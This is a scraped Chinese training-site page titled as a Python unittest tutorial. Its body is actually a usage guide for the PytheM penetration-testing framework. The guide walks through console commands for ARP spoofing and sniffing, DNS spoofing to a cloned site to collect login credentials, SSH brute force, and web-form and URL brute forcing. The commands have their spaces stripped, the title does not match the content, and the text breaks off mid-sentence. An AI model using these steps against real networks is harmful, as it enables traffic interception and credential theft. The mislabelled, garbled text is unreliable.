一区二区三区中文国产亚洲_另类视频区第一页_日韩精品免费视频_女人免费视频_国产综合精品久久亚洲

千鋒教育-做有情懷、有良心、有品質(zhì)的職業(yè)教育機(jī)構(gòu)

手機(jī)站
千鋒教育

千鋒學(xué)習(xí)站 | 隨時(shí)隨地免費(fèi)學(xué)

千鋒教育

掃一掃進(jìn)入千鋒手機(jī)站

領(lǐng)取全套視頻
千鋒教育

關(guān)注千鋒學(xué)習(xí)站小程序
隨時(shí)隨地免費(fèi)學(xué)習(xí)課程

當(dāng)前位置:首頁  >  技術(shù)干貨  > Python的Unittest單元測(cè)試使用詳解

Python的Unittest單元測(cè)試使用詳解

來源:千鋒教育
發(fā)布人:xqq
時(shí)間: 2023-11-06 21:21:54 1699276914

PytheM是一個(gè)Python滲透測(cè)試框架。它只能在osnGNU/LinuxOS系統(tǒng)上運(yùn)行。

安裝

$sudoapt-getupdate$sudoapt-getinstalllibasound-devlibjack-jackd2-devportaudio19-devpython-pyaudiobuild-essentialpython-devlibnetfilter-queue-devlibespeak1libffi-devlibssl-dev$sudogitclonehttps://github.com/m4n3dw0lf/PytheM/$cdPytheM$sudopipinstall-rrequirements.txt

運(yùn)行

$sudo./pythem

例子

ARP欺騙-HTTP中間人攻擊

命令:

pythem>setinterface[+]Entertheinterface:wlan0pythem>setgateway[+]Enterthegateway:192.168.1.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>sniff[+]Enterthefilter:http

ARP+DNS欺騙-重定向到偽造的頁面,收集登錄憑證

使用SET等克隆工具克隆你選中的網(wǎng)站,并部署在Apache2上

命令:

pythem>settarget[+]Enterthetarget(s):192.168.0.8pythem>setinterfacewlan0pythem>setgateway192.168.0.1pythem>arpspoofstart[+]Settingthepacketforwarding.[+]Iptablesredefined.[+]ARPspoofinginitialized.pythem>dnsspoofstart[+]Domaintobespoofed:www.google.com[+]IPaddresstoberedirected:192.168.0.6[+]DNSspoofinginitialized.pythem>sniffdns

SSH暴破-暴力破解

pythem>servicesshstartpythem>settarget[+]Enterthetarget(s):127.0.0.1pythem>setfilewordlist.txtpythem>brute-forcessh[+]Entertheusernametobruteforce:anon123

Web頁面參數(shù)暴力破解

首先獲取web頁面登錄時(shí)的參數(shù)格式id=value

顯示重定向頁面,如果定向到一個(gè)不同的頁面則說明猜解正確。

命令

pythem>settargethttp://127.0.0.1/pythem>setfile[+]Enterthepathtothefile:wordlist.txtpythem>brute-forcewebform[+]Brute-Formauthenticationinitialized.[+]Entertheinputidoftheusernamebox:vSIS_ID[+]Entertheinputidofthepasswordbox:vSIS_PASS[+]Entertheusernametobrute-forcetheformulary:root

URL內(nèi)容爆破

pythem>settarget[+]Enterthetarget(s):http://testphp.vulnweb.com/index.php?id=pythem>setfile1to100.txtpythem>brute-forceurl[+]ContentURLbruterinitialized.

功能

[PytheM–PenetrationTestingFrameworkv0.3.2]

help:

打印幫助信息。

exit/quit:

退出程序。

set:

設(shè)置變量的值,參數(shù):

interface

gateway

target

file

arpmode例子:

pythem>setinterface|openinputtoset

或者

pythem>setinterfacewlan0|don'topeninputtosetvalue

print:

打印變量的值,例子:

pythem>printgateway

scan:

進(jìn)行tcp/manualport/arp掃描.

(應(yīng)該在設(shè)置完網(wǎng)卡和目標(biāo)后再調(diào)用)例子:

pythem>scan

或者

pythem>scantcp

arpspoof:

開始或結(jié)束arpspoofing攻擊.(使用rep或req可以設(shè)置arp欺騙的模式,rep表示欺騙響應(yīng),req表示欺騙請(qǐng)求)

參數(shù)

start

stop

例子:

arpspoofstartarpspoofstop

dnsspoof:

開始dnsspoofing攻擊.(應(yīng)該在arp欺騙攻擊開始后再調(diào)用)例子:

pythem>dnsspoofstartpythem>dnsspoofstop

sniff:

開始嗅探數(shù)據(jù)包(應(yīng)該在設(shè)置網(wǎng)卡后再調(diào)用)例子:

pythem>sniffhttp

或者

pythem>sniff

[+]Enterthefilter:port1337andhost10.0.1.5|tcpdumplikeformatorhttp,dnsspecificfilter.

pforensic:

開始分析數(shù)據(jù)包(應(yīng)該在設(shè)置完網(wǎng)卡和.pcap文件后調(diào)用)例子:

pythem>pforensicpforensic>help

brute-force:

開始暴力破解攻擊(應(yīng)該在設(shè)置完目標(biāo)和字典文件路徑后調(diào)用)參數(shù):

ssh|目標(biāo)是IP地址ipaddressastargeturl|目標(biāo)是url(包含http://或https://)webform|目標(biāo)是url(包含http://或https://)例子:pythem>brute-forcewebformpythem>brute-forcessh

geoip:

顯示IP地址的大概位置(應(yīng)該在設(shè)置目標(biāo)(IP地址)后再調(diào)用)例子:

pythem>geoip

或者

pythem>geoip8.8.8.8

decodeandencode:

以選擇的模式解碼和編碼字符串,例子:

pythem>decodebase64pythem>encodeascii

cookiedecode:

解碼base64url編碼的cookie的值,例子:

pythem>cookiedecode

其它在控制臺(tái)可以執(zhí)行的命令,比如cd,ls,nano,cat等。

Jarvis–聲音控制助手

[*]jarvistypejarvis-helptoseethejarvishelppage.examples:pythem>jarvis(以語音識(shí)

以上內(nèi)容為大家介紹了Python的Unittest單元測(cè)試使用詳解,希望對(duì)大家有所幫助,如果想要了解更多Python相關(guān)知識(shí),請(qǐng)關(guān)注IT培訓(xùn)機(jī)構(gòu):千鋒教育。http://m.fengjieshuijing.cn/

聲明:本站稿件版權(quán)均屬千鋒教育所有,未經(jīng)許可不得擅自轉(zhuǎn)載。
10年以上業(yè)內(nèi)強(qiáng)師集結(jié),手把手帶你蛻變精英
請(qǐng)您保持通訊暢通,專屬學(xué)習(xí)老師24小時(shí)內(nèi)將與您1V1溝通
免費(fèi)領(lǐng)取
今日已有369人領(lǐng)取成功
劉同學(xué) 138****2860 剛剛成功領(lǐng)取
王同學(xué) 131****2015 剛剛成功領(lǐng)取
張同學(xué) 133****4652 剛剛成功領(lǐng)取
李同學(xué) 135****8607 剛剛成功領(lǐng)取
楊同學(xué) 132****5667 剛剛成功領(lǐng)取
岳同學(xué) 134****6652 剛剛成功領(lǐng)取
梁同學(xué) 157****2950 剛剛成功領(lǐng)取
劉同學(xué) 189****1015 剛剛成功領(lǐng)取
張同學(xué) 155****4678 剛剛成功領(lǐng)取
鄒同學(xué) 139****2907 剛剛成功領(lǐng)取
董同學(xué) 138****2867 剛剛成功領(lǐng)取
周同學(xué) 136****3602 剛剛成功領(lǐng)取
相關(guān)推薦HOT